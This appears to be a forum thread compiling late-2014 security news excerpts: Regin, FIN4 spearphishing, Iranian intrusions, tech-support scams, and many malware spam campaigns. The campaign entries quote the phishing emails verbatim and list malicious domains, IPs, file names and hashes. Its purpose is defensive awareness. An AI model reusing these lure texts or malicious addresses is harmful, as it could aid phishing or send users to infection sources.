The discovery of Regin highlights how significant investments continue to be made into the development of tools for use in intelligence gathering. Symantec believes that many components of Regin remain undiscovered and additional functionality and versions may exist..."
> http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99

- http://community.websense.com/blogs/securitylabs/archive/2014/11/24/what-protection-can-be-offered-from-sophisticated-malware-such-as-regin.aspx
24 Nov 2014
___

Avast AV can't handle Windows fixes ??
- http://www.theregister.co.uk/2014/11/24/you_stupid_brick_pcs_running_avast_av_cant_handle_windows_fixes/
24 Nov 2014 - "Security software outfit Avast are trying to figure out why the combination of recent Windows patches and updates to the latter company's software are breaking PCs. Hordes of users have found that their PCs, especially those running Windows 8 and 8.1, grind to a halt after they apply both Microsoft's recent KB3000850 update rollup and Avast's latest automatic updates. Some users report their PCs won't boot, or take forever to apply patches... Avast forums*... Microsoft's not immune either: a Redmond thread titled Major issues with KB3000850 includes plenty of people wondering why the company issued an update incompatible with third-party software**. That criticism may not be entirely fair, as an Avast staffer has posted the following explanation for the mess:
'We have been able to simulate the problem in our lab and I think we fixed this issue. This Windows updates calls new memory related functions which are not fully compatible with Avast' ... Whatever the cause, a fair few people are rather upset with both Avast and Microsoft, with the latter company most often felt to be in the wrong..."
* https://forum.avast.com/index.php?topic=160717.0

** http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/major-issues-with-kb3000850/5cb4cddd-52da-44af-9fd5-3ae1a72b0b1a
___

FTC Obtains Court Orders Temporarily Shutting Down Massive Tech Support Scams
FTC, State of Florida Charge Companies Bilked $120 Million from Consumers for Bogus Software and Tech Support Service
- http://www.ftc.gov/news-events/press-releases/2014/11/ftc-obtains-court-orders-temporarily-shutting-down-massive-tech
Nov 19, 2014 - "At the request of the Federal Trade Commission and the State of Florida, a federal court has temporarily shut down two massive telemarketing operations that conned tens of thousands of consumers out of more than $120 million by deceptively marketing computer software and tech support services. The orders also temporarily freeze the defendants’ assets and place the businesses under the control of a court-appointed receiver. According to complaints filed by the FTC, since at least 2012, the defendants have used software designed to trick consumers into thinking there are problems with their computers, then subjected those consumers to high-pressure deceptive sales pitches for tech support products and services to fix their non-existent computer problems... In this latest action, the FTC and the State of Florida have filed two separate cases against companies who allegedly sold the -bogus- software and the deceptive telemarketing operators who allegedly sold -needless- tech support services:
- In the first case, the defendants selling software include PC Cleaner Inc.; Netcom3 Global Inc.; Netcom3 Inc., also doing business as Netcom3 Software Inc.; and Cashier Myricks, Jr. The telemarketing defendants include Inbound Call Experts LLC; Advanced Tech Supportco. LLC; PC Vitalware LLC; Super PC Support LLC; Robert D. Deignan, Paul M. Herdsman, and Justin M. Wright.
- In the second case, the defendants selling software include Boost Software Inc. and Amit Mehta, and the telemarketing defendants include Vast Tech Support LLC, also doing business as OMG Tech Help, OMG Total Protection, OMG Back Up, downloadsoftware.com, and softwaresupport.com; OMG Tech Help LLC; Success Capital LLC; Jon Paul Holdings LLC; Elliot Loewenstern; Jon-Paul Vasta; and Mark Donahue.
According to the FTC’s complaints, each scam starts with computer software that purports to enhance the security or performance of consumers’ computers. Typically, consumers download a free trial version of software that runs a computer system scan. The defendants’ software scan always identifies numerous errors on consumers’ computers, regardless of whether the computer has any performance problems..."

:fear::fear:

FYI...

What the heck is with 104.152.215.0/25?
- http://blog.dynamoo.com/2014/11/what-heck-is-with-104152215025.html
25 Nov 2014 - "A contact gave me the heads up to an exploit-kit running on 104.152.215.90* [virustotal] which appears to be using MS16-064** among other things . 104.152.215.90 belongs to Query Foundry LLC in Wyoming, however they suballocated it to a customer... The random structure of most of the domains is an indicator of possible maliciousness. The few domains that don't meet these pattern seem to be .fr domains which look like they have been hijacked or re-registered.. and oddly they are all registered to different (often obviously fake) people at the same address in France... not much data about the range, there are a couple of domains that are also flagged a malicious:
sxzav .xyz [Google diagnostics]: [url]http://www.google.com/safebrowsing/diagnostic?site=sxzav.xyz
klioz .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=klioz.xyz
... there is enough evidence to treat 104.152.215.0/25 as a suspect network. It does not appear to have any legitimate sites, the sites that do exist are of an unknown purpose and often have apparently fake WHOIS details for the domains. Blocking or monitoring for traffic to and from that /25 is the easiest way of doing it..."
* https://www.virustotal.com/en/ip-address/104.152.215.90/information/

** https://technet.microsoft.com/en-us/library/security/ms14-064.aspx

*** http://urlquery.net/report.php?id=1416802220951
___

Fake 'my photo' SPAM - new trojan variant
- http://blog.mxlab.eu/2014/11/25/latest-my-photo-email-contains-new-trojan-variant/
Nov 25, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “my photo”.
This email is sent from a spoofed address and has the following body:

my new photo :)

The attached file my_iphone_photo.zip contains the folder with the 54 kB large file 1my_photo.exe and the 30 kB large file 2my_photo.jpg. The trojan is known as a variant of MSIL/Injector.GMB, UDS:DangerousObject.Multi.Generic, Trojan.MSIL.BVXGen or Win32.Trojan.Inject.Auto. At the time of writing, 4 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/28993a2effd007e5d6c5453f61268c37c94c8d666156d0ebcae2e4dca004dcff/analysis/1416912927/

:fear: :mad:

FYI...

QuickBooks Payment Overdue Spam
- http://threattrack.tumblr.com/post/103653348923/quickbooks-payment-overdue-spam
Nov 26, 2014 - "Subjects Seen:
Payment Overdue
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/22/2014 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Lucio Gee
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.

Malicious File Name and MD5:
Invoice_[-var=partorderb].zip (A3374A3639D4F8EBF105B8FFA1ACB4D1)
Invoice_0128648.scr (08AEA8B75143DC788A52568E823DD10E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1856c0ee3c8aea258ec44e55795007bc/tumblr_inline_nfnt72zuuJ1r6pupn.png

Tagged: QuickBooks, Upatre

:fear::fear:

FYI...

Fake HMRC SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/hmrc-taxes-application-reference-68j9-wdwk-1nmj-p0za-received-fake-pdf-malware/
27 Nov 2014 - "'HMRC taxes application with reference 68J9 WDWK 1NMJ P0ZA received' pretending to come from noreply@ taxreg.hmrc .gov.uk with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The application with reference number 68J9 WDWK 1NMJ P0ZA submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

27 November 2014: HM Revenue & Customs – TAX.zip: Extracts to: HM Revenue & Customs – TAX.scr
Current Virus total detections: 2/56* ( same malware as THIS**). This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/580df36f77762a526dced5127ae216a057314bea0b80e92e239db41f8a4f46b0/analysis/1417085413/
... Behavioural information
TCP connections
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
83.125.22.167: https://www.virustotal.com/en/ip-address/83.125.22.167/information/

** http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
___

Tainted network: Crissic Solutions (167.160.160.0/19)
- http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
27 Nov 2014 - "Several IPs hosted on the Crissic Solutions range of 167.160.160.0/19 (suballocated from QuadraNet) have been hosting exploit kits in the past few days, leading to Cryptolocker and other nastiness. I analysed over 1500 sites hosted in the Crissic IP address range... and many sites were already marked as being -malicious- by Google, and some other sites obviously follow the same naming pattern and must be considered as malicious... Given the concentration of active malicious servers in 167.160.165.0/24 and 167.160.166.0/24 then I would recommend -blocking- your traffic to those ranges at least temporarily, despite there being legitimate sites in that range. You might choose to block the entire /19 of course, I will leave you to look at the evidence..."
More detail at the dynamoo URL above.)

:fear: :mad:

FYI...

Black Friday: deal or no deal
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-deal-or-no-deal/
Nov 27, 2014 - "... Spammers and scammers have risen to the occasion with deals that are too good to be true such as in this example for -fake- Gucci products. This was reported in a Tweet by Denis Sinegubko, from Unmask Parasites*
* http://www.unmaskparasites.com/ -- https://twitter.com/unmaskparasites
'Denis @unmaskparasites - Chinese spammers are ready for Black Friday. Found these domains in code on a hacked site: GucciBlackFridays .com, BlackFridayCDN .com'
... and also a security researcher at Sucuri** -- http://sucuri.net/ -- http://blog.sucuri.net/2014/11
The site boasts incredible prices on normally very expensive merchandise... Shoppers might get fooled by the security badges and stamps, which of course are only here for show... Traffic to these -bogus- sites will come from spam or, as in this case, from compromised websites... This code resides on the compromised server and performs different checks, in particular whether the user visiting the page is real or a search engine... When Black Friday is over, the crooks will be ready to serve you special deals for Cyber Monday... There certainly are good deals to be made during this holiday season but you really ought to be careful what you click on. You might order counterfeit goods or have your banking credentials stolen and money depleted..."
(More detail at the malwarebytes URL above.)

- https://blog.malwarebytes.org/online-security/2014/11/black-friday-and-cyber-monday-online-shopping-made-safer/
Nov 24, 2014

- http://www.trendmicro.com/vinfo/us/security/news/mobile-safety/a-guide-to-avoiding-cyber-monday-scams-on-mobile
Nov 24, 2014

- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/staying-safe-from-online-threats-this-thanksgiving
Nov 21, 2014
___

Lots of Black Friday SPAM & Phishing
- https://isc.sans.edu/diary.html?storyid=19003
2014-11-28 23:20:46 UTC - "Likely every reader out there, their friends and family, even their pets with email accounts, have received Black Friday SPAM or phishing attempts today. Our own Dr. J sent the handlers an Amazon sample for 'One Click Black Friday Rewards'.
Of course, that one click goes -nowhere- near Amazon and directs you to the likes of Black Fiday (yes, it's misspelled) at hXXp ://www.jasbuyersnet .com/cadillac/umbered/sedatest/styes/coleuses/unterrified.htm. Can't speak to the payload there, don't bother, just use it at as ammo for heightened awareness and safe shopping on line during these holidays, and...well, all the time. Be careful out there. :-)
Cheers and happy holidays."
___

Best Buy Order Spam
- http://threattrack.tumblr.com/post/103809164928/best-buy-order-spam
Nov 28, 2014 - "Subjects Seen:
Details of Your Order From Best Buy
Typical e-mail details:
E-shop Best Buy has received an order addressed to you which has to be confirmed by the recipient within 4 days.
Upon confirmation you may pick it in any nearest store of Best Buy.
Detailed order information is attached to the letter.
Wishing you Happy Thanksgiving!
Best Buy

Malicious File Name and MD5:
BestBuy_Order.exe (bff17aecb3cc9b0281275f801026b75d)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d119ffd996422b655f2ff200a50953b/tumblr_inline_nfrayxzYyG1r6pupn.jpg

Tagged: Best Buy, Kuluoz

:fear::fear: :mad:

FYI...

Dridex Phish uses malicious word docs
- https://isc.sans.edu/diary.html?storyid=19011
2014-12-01 - "... During the past few months, Botnet-based campaigns have sent waves of phishing emails associated with Dridex... The emails contained malicious Word documents, and with macros enabled, these documents -infected- Windows computers with Dridex malware. Various people have posted about Dridex [1] [2], and some sites like Dynamoo's blog and TechHelpList... often report on these and other phishing campaigns... On 11 Nov 2014, I saw at least 60 emails with 'Duplicate Payment Received' in the subject line. This appeared to be a botnet-based campaign from compromised hosts at various locations across the globe... Monitoring the infection traffic on Security Onion, we found alerts for Dridex traffic from the EmergingThreats signature set (ET TROJAN Dridex POST Checkin) [3]... File hashes changed during this wave of emails, indicating at least 3 different Word documents were used. During this phishing run, Dridex malware came from IP addresses in the 62.76.185.0/24 block..."
1] http://stopmalvertising.com/malware-reports/analysis-of-dridex-cridex-feodo-bugat.html

2] http://www.abuse.ch/?p=8332

3] https://isc.sans.edu/diaryimages/images/brad5.png

4] http://doc.emergingthreats.net/2019478

62.76.185.127: https://www.virustotal.com/en/ip-address/62.76.185.127/information/
___

Fake 'New offer Job' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-offer-job-fake-pdf-malware/
1 Dec 2014 - "'New offer Job' with a zip attachment pretending to come from Job service <billiond8@ greatest3threeisland .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
New offer for you, see attached here.

There is also a version around with the subject of 'Tiket alert' pretending to come from FBR service <newspaperedixv@ greatest3threeisland .com>
Look at the attached file for more information.
Assistant Vice President, FBR service
Management Corporation

Both emails contain the same malware as does today’s version of 'my new photo malware'*
1 December 2014 : tiket.zip: Extracts to: tiket.exe
Current Virus total detections: 5/19** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/new-photo-malware/

** https://www.virustotal.com/en/file/3baa6154cae386bd89d4fce302adad6b5085cac01bcbe03c4fc709ee5173f07e/analysis/1417475226/
___

Phishing scam that hit Wall Street might work against you
- http://arstechnica.com/security/2014/12/phishing-scam-that-penetrated-wall-street-just-might-work-against-you-too/
Dec 1 2014 - "Researchers have uncovered a group of Wall Street-savvy hacks that have penetrated the e-mail accounts of more than 100 companies, a feat that has allowed them to obtain highly valuable plans concerning corporate acquisitions and other insider information.
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/outlook-phish-640x359.jpg
FIN4, as the group is known, relies on a set of extremely simple tactics that in many cases has allowed them to remain undetected since at least the middle of 2013, according to a report published Monday from security firm FireEye*. Members boast a strong command of the English language and knowledge of corporate finance and Fortune 500 culture. They use that savvy to send highly targeted spearphishing e-mails that harvest login credentials for Microsoft Outlook accounts. The group then uses compromised accounts of one employee, customer, or partner to send spearphishing e-mails to other company insiders. At times, the attackers will -inject- a malicious message into an ongoing e-mail discussion among multiple people, furthering their chances of success. E-mails are sent from the accounts of people the target knows, and they discuss mergers, acquisitions, or other topics already in progress. The attackers often bcc other recipients to make it more difficult to detect the malicious e-mail. The messages appear to be written by native English speakers and often contain previously exchanged Microsoft Office documents that embed hidden malicious macros. This results in fraudulent e-mails that are extremely hard to detect, even by some people who have been trained to spot such phishing campaigns... FireEye researchers said FIN4 members have compromised the accounts of C-level executives, legal counsel, regulatory and compliance personnel, scientists, and advisors of more than 100 companies. About 80 of them are publicly traded companies, while the remaining 20 are Wall Street firms that advise corporations on legal or securities matters or possible or pending mergers and acquisitions. As a result, the group stood to make a windfall if it used the insider information to buy or sell stocks before the information became widely known... Embedded in the previously stolen documents are Visual Basic Applications (VBA) macros that prompt readers to enter the Outlook user names and passwords. The scripts then funnel the credentials to servers controlled by the attackers. In other, earlier cases, the spearphishing e-mails contained links to fake Outlook Web App login pages that prompted visitors to enter their passwords. Some of the attacks FireEye observed targeted multiple parties inside law firms, consultancies, and corporations as they discussed particular pending business deals. In one instance, attackers used previously acquired access to e-mail accounts at an advisory firm to harvest information being exchanged about an acquisition under consideration involving one of its clients... the best thing any potential target can do is to educate employees how to spot phishing attacks. The FIN4 attackers have just raised the bar, so chances are most education programs should be revised to help employees spot these new and improved tactics."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

- http://www.reuters.com/video/2014/12/02/cyber-spies-steal-corporate-secrets-to-r?videoId=347691634
Dec 01, 2014
Video: 02:09

- http://www.computerworld.com/article/2853697/fireeye-suspects-fin4-hackers-are-americans-after-insider-info-to-game-stock-market.html
Dec 1, 2014
> http://core0.staticworld.net/images/article/2014/12/fin4-targets-100533260-large.idge.jpg

- http://www.theregister.co.uk/2014/12/02/malware_raids_stock_markets/
2 Dec 2014
> http://regmedia.co.uk/2014/12/02/11223.png
___

Europol and US customs seize 292 domains selling counterfeit goods
- http://www.theinquirer.net/inquirer/news/2384329/europol-and-us-customs-seize-292-domains-selling-counterfeit-goods
Dec 1, 2014 - "... Interpol in conjunction with US Immigration and Customs Enforcement has seized the domains of almost 300 websites that were selling counterfeit merchandise. The law enforcement agencies, not to mention politicians, are concerned that citizens are being taken for mugs online and cannot resist spending good money on fake rubbish... Europol said that the seizures involved 25 law enforcement agencies from 19 countries and participation from the US National Intellectual Property Rights Coordination Center... The websites offered a mix of content, ranging from luxury goods and sportswear to CDs and DVDs. The domains are now in the hands of the national governments involved in the shutdowns, and the gear is presumably facing some sort of immolation. Operation In Our Sites has closed down 1,829 domains so far..."
___

O/S Market Share - Nov 2014
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0

Browser Market Share - Nov 2014
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
___

PoS Malware 'd4re|dev1|' attacking Ticket Machines and Electronic Kiosks
- https://www.intelcrawler.com/news-24
Nov 26, 2014 - "... new type of Point-of-Sale malware called “d4re|dev1|”. This new strain of malware, which is hitting Mass Transit Systems, acts as an advanced backdoor with remote administration, having RAM scrapping and keylogging features. This new POS malware find adds to a growing list of POS variants being developed by underground cyber criminals because of the high ROI when they hit payloads like a Target or Home Depot. Variants recently identified and profiled by IntelCrawler include POSCLOUD, Nemanja, JackPOS, BlackPOS, and Decebal. The exploitation of merchants is taking place on a global scale as outlined by the IntelCrawler POS infection map*.
* https://www.intelcrawler.com/analytics/pmim
... The malware has a “File Upload” option, which can be used for remote payload updating. The process of malware was masked under “PGTerm.exe” or “hkcmd.exe”, as well as legitimate names of software such as Google Chrome. Adversaries use this option for the installation of additional backdoors and tools, which allows them to avoid infrastructure limitations and security policies designed for detection. This broad lateral approach shows that serious cybercriminals are not interested in just one particular Point-of-Sale terminal – they are looking for enterprise wide network environments, having tens of connected devices accepting payments and returning larger sets of spoils to their C2 servers... As this POS malware market is evolving, new security measures are needed to combat the seemingly continuous strains being developed by the underground. In addition to consulting your PCI vendor, IntelCrawler strongly recommends to encapsulate any administration channels to the -VPN- as well as to limit the software environment for operators, using proper access control lists and updated security polices..."

:fear: :mad:

FYI...

Fake Walmart 'Order Details' SPAM opens malware site
- http://www.hoax-slayer.com/walmart-order-details-malware.shtml
Dec 2, 2014 - "Email purporting to be from Walmart claims that you can click a link to read more information about a recent order. The email is a scam... Clicking the link opens a website that contains malware. This attack is very similar to another malware campaign in which -bogus- emails claim to be from Costco*...
> http://www.hoax-slayer.com/images/walmart-order-details-malware-1.jpg
This email, which claims to be from retail giant Walmart, advises that your order is ready to be picked up at any local store. It invites you to -click-a-link- to find out more information about the supposed order... the email is -not- from Walmart and has nothing to do with any order you have made. The goal of the email is simply to trick you into clicking the link. If you receive this email, you may be concerned that fraudulent purchases have been made in your name and click the link in the hope of finding out more details... the link opens a compromised website that harbours malware. In some versions, the malicious download may start automatically. In other cases, a notice on the website may instruct you to download a file to view the order information. Generally, the download will be a .zip file that contains a .exe file inside. Clicking the .exe file will install the malware on your computer. The exact malware payload delivered in such attacks may vary... This attack closely mirrors another current malware campaign that uses emails that falsely claim to be from Costco*. Again, the email claims that you can get information about recent purchase by clicking a link. Clicking downloads a .zip file that contains malware."
* http://www.hoax-slayer.com/costco-order-notification-malware.shtml
Nov 28, 2014
> http://www.hoax-slayer.com/images/costco-order-notification-malware-2.jpg
___

Fake 'FEDEX TRACK' 'FEDEX INFO' SPAM - contains trojan
- http://blog.mxlab.eu/2014/12/02/fake-emails-from-fedex-track-or-fedex-info-contains-trojan/
Dec 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
- Ezekiel Francis your agent FEDEX
- Bullock, Tiger P. agent FEDEX
- Quin Greer FEDEX company
This email is sent from the -spoofed- address “FEDEX TRACK <******@ care .it>”, FEDEX INFO <fedexservice@ care .info> or “FEDEX INFO <fedextechsupport@ care .org>” and has the following body:
Dear Customer!
We attempted to deliver your package on December 2th, 2014, 10:50 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the invoice that is attached to this email and visit Fedex location indicated in the receipt.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 45675665665
Expected Delivery Date: December 2th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you ...

The attached file Package.zip contains the 180 kB large file 45675665665.scr... At the time of writing, 3 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/3848d21eddfb5d70a39406bf45652f6daed3432cbd61bef50e705350904ebd3b/analysis/
___

Iran hacks target airlines, energy, defense companies
- http://www.reuters.com/article/2014/12/02/us-cybersecurity-iran-idUSKCN0JG18I20141202
Dec 2, 2014 - "Iranian hackers have infiltrated major airlines, energy companies, and defense firms around the globe over the past two years in a campaign that could eventually cause physical damage, according to U.S. cyber security firm Cylance*. The report comes as governments scramble to better understand the extent of Iran's cyber capabilities, which researchers say have grown rapidly as Tehran seeks to retaliate for Western cyber attacks on its nuclear program... The California-based company said its researchers uncovered breaches affecting more than 50 entities in 16 countries, and had evidence they were committed by the same Tehran-based group that was behind a previously reported 2013 cyber attack on a U.S. Navy network. It did not identify the companies targeted, but said they included major aerospace firms, airports and airlines, universities, energy firms, hospitals, and telecommunications operators based in the United States, Israel, China, Saudi Arabia, India, Germany, France, England and others. Cylance said it had evidence the hackers were Iranian, and added the scope and sophistication of the attacks suggested they had state backing... Cylance Chief Executive Stuart McClure said the Iranian hacking group has so far focused its campaign - dubbed Operation Cleaver - on intelligence gathering, but that it likely has the ability to launch attacks. He said researchers who succeeded in gaining access to some of the hackers' infrastructure found massive databases of user credentials and passwords from organizations including energy, transportation, and aerospace companies, as well as universities. He said they also found diagrams of energy plants, screen shots demonstrating control of the security system for a major Middle Eastern energy company, and encryption keys for a major Asian airline... Cylance said its researchers also obtained hundreds of files apparently stolen by the Iranian group from the U.S. Navy's Marine Corps Intranet (NMCI). U.S. government sources had confirmed that Iran was behind the 2013 NMCI breach..."
* http://blog.cylance.com/operation-cleaver-prevention-is-everything
Dec 2, 2014
- http://www.cylance.com/operation-cleaver/?&__hssc=&__hstc&hsCtaTracking=d1078200-8921-49f2-ab9c-6f87b7a0c3ee|25e0e347-ef8e-475e-9c59-4b051299b3ea
___

Fake 'Voice Message from Message Admin' SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/01/fake-emails-voice-message-0174669888-from-message-admin-leads-to-malware/
Dec 1, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Voice Message #0174669888″ (number will vary). This email is sent from the -spoofed- address 'Message Admin <NoRepse@ voiceservice .com>” and has the following body:

Voice redirected message
hxxp ://www.studio37kriswhite .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 19:06:35 +0000

Voice redirected message
hxp ://thepinkcompany .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 20:10:47 +0000

The embedded URL leads to a web page with a Javascript that is making use of an ActiveXObject to download the file voice646-872-8712_wav.zip. Once extracted, the 43 kB large file voice646-872-8712_wav.exe is present. The trojan is known as W32.HfsAutoA.631F, Trojan.DownLoader11.46947, UDS:DangerousObject.Multi.Generic , Upatre.FE or BehavesLike.Win32.Backdoor.pz.
The trojan is capable of starting a listening server, make HTTP requests, can fingerprint a system and have outbound communication. A service bowmc.exe will be installed, the TCP port 1034 will be opened and connection with the IP on port 21410 and 21397 will be openened for outbound traffic. At the time of writing, 8 of the 55* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8e3b9d3e0c04be729180a959c167ac3330fb4d3506e6ab5375a1876f2b1f6cca/analysis/1417468098/
... Behavioural information
TCP connections
192.186.219.137: https://www.virustotal.com/en/ip-address/192.186.219.137/information/
UDP communications
91.200.16.56: https://www.virustotal.com/en/ip-address/91.200.16.56/information/
91.200.16.37: https://www.virustotal.com/en/ip-address/91.200.16.37/information/

:mad: :fear::fear:

FYI...

More malware on Crissic Solutions LLC
- http://blog.dynamoo.com/2014/12/more-malware-on-crissic-solutions-llc.html
3 Dec 2014 - "Another bunch of IPs on Crissic Solutions LLC, leading to what appears to be the Angler EK (see this URLquery report*):
167.160.164.102: https://www.virustotal.com/en/ip-address/167.160.164.102/information/
167.160.164.103: https://www.virustotal.com/en/ip-address/167.160.164.103/information/
167.160.164.141: https://www.virustotal.com/en/ip-address/167.160.164.141/information/
167.160.164.142: https://www.virustotal.com/en/ip-address/167.160.164.142/information/
... domains are being exploited (although there will probably be more soon)... Subdomains in use start with one of qwe. or asd. or zxc... Crissic Solutions LLC operates 167.160.160.0/19 which does have some legitimate sites in it, but since I have previously recommended** blocking 167.160.165.0/24 and 167.160.166.0/24 and now with -multiple- servers on 167.160.164.0/24 also compromised then I suspect that temporarily blocking the entire /19 is the way to go."
* http://urlquery.net/report.php?id=1417554412643

** http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
___

Fake 'Fedex Unable to deliver your item' SPAM - malware
- http://myonlinesecurity.co.uk/fedex-unable-deliver-item-00486182-malware/
3 Dec 2014 - "'FedEx Unable to deliver your item, #00486182' pretending to come from FedEx International Economy with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
FedEx ®
Dear Customer,
We could not deliver your parcel.
Please, open email attachment to print shipment label.
Regards,
Francis Huber,
Delivery Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.

3 December 2014: Label_00486182.zip: Extracts to: Label_00486182.doc.js
Current Virus total detections: 4/55* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e78a7c9ae488585a690dc8b5f3b6ebafaf8451ec93462810bd632e51e228fd3/analysis/1417611902/
___

Be Wary of ‘Order Confirmation’ Emails
- http://krebsonsecurity.com/2014/12/be-wary-of-order-confirmation-emails/
Dec 3, 2014 - "If you receive an email this holiday season asking you to “confirm” an online e-commerce order or package shipment, please resist the urge to -click- the included -link- or attachment: Malware purveyors and spammers are blasting these missives by the millions each day in a bid to trick people into giving up control over their computers and identities.
'Order confirmation' malware email blasted out by the Asprox spam botnet:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/hd-asprox-600x273.png
Seasonal scams like these are a perennial scourge of the holidays, mainly because the methods they employ are reliably successful. Crooks understand that it’s easier to catch would-be victims off-guard during the holidays. This goes even for people who generally know better than to click on links and attachments in emails that spoof trusted brands and retailers, because this is a time of year when many people are intensely focused on making sure their online orders arrive before Dec. 25:
This Asprox malware email poses as a notice about a wayward package from a WalMart order.
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/wm-asprox-600x308.png
According to Malcovery*, a company that closely tracks email-based malware attacks, these phony “order confirmation” spam campaigns began around Thanksgiving, and use both booby-trapped links and attached files in a bid to infect recipients’ Windows PCs with the malware that powers the Asprox spam botnet. Asprox is a nasty Trojan that harvests email credentials and other passwords from infected machines, turns the host into a zombie for relaying junk email...
Target is among the many brands being spoofed by Asprox this holiday season:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/tg-asprox-600x373.png
... do not click the embedded links or attachments..."

* http://blog.malcovery.com/blog/asprox-malware-threat-targets-holiday-shoppers
Dec 3, '14

:fear: :mad:

FYI...

Something evil on 46.161.30.0/24
- http://blog.dynamoo.com/2014/12/something-evil-on-4616130024.html
4 Dec 2014 - "The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware. In the past, this IP range has hosted various sites which have moved off... There are no legitimate sites in this network range, so I strongly recommend that you -block- the entire 46.161.30.0/24 range."
(More detail at the dynamoo URL above.)
___

Fake 'Quickbooks intuit unpaid invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/quickbooks-intuit-unpaid-invoice-fake-pdf-malware/
4 Dec 2014 - "'Quickbooks intuit unpaid invoice' with a zip attachment pretending to come from Elena.Lin@ intuit .com <Elena.Lin@ quickbooks .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoice and pay this invoice at your earliest convenience. Feel free to contact us if you have any
questions.
Thank you.

4 December 2014 : invoice72.zip: Extracts to: invoice72.scr
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/300feec373535aa4fabfd8a157f1e5afa37af98f6a7d432b50078e16d77480c1/analysis/1417726300/
... Behavioural information
TCP connections
80.248.222.238: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
198.58.84.150: https://www.virustotal.com/en/ip-address/198.58.84.150/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___

Fake 'FedEx Delivery' confirmation - phishing 419 SCAM
- http://myonlinesecurity.co.uk/fedex-delivery-notification-confirmation-phishing-419-scam/
